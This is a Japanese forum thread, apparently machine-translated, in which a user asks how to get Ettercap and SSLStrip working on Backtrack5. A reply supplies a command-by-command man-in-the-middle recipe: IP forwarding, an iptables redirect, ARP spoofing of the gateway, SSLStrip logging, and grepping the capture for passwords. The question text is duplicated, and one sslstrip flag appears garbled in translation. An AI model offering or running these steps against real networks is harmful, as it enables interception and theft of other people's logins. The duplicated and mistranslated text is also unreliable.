私はこれにBacktrack5を使用しています..しかし行き詰まっています...必要なデータを取得できません。これにはEttercapとSSL Stripを使用しています...
ここで誰もそれを行う方法を考えていますか?
私はこれにBacktrack5を使用しています..しかし行き詰まっています...必要なデータを取得できません。これにはEttercapとSSL Stripを使用しています...
ここで誰もそれを行う方法を考えていますか?
どうやっているのかはわかりませんが、私にとっては、ettercap-gtk (GUI) は常にゴミでした。簡単な DNS スプーフィングが必要でない限り、ettercap をスキップして、別のルートに進むことをお勧めします。
この攻撃 (Man in the middle、amirite) 用に iptables をセットアップし、ip_forward(ing) を有効にすることから始めて、いくつかの手順を説明しましょう。
エコー "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1337 (送信先の任意のポートを選択できます)
ここで中間者になります: ここでは arpspoof を使用します: arpspoof -i wlan0 (または任意のインターフェイス) 192.168.1.X (X は通常 .1 または .255 のゲートウェイです)
次に SSLStrip を使用すると、./sslstrip.py -1 1337 -w filename (1337 は以前のポート、filename はデータをダンプする任意のファイル名) に進むことができます。
cat filename (以前のもの) とパイプ | でさえも。grep "password" など、スニッフィングしているものは何でも、またはすべてをダンプすることもできます。ファイルは、キャプチャ/削除された https データでいっぱいになります。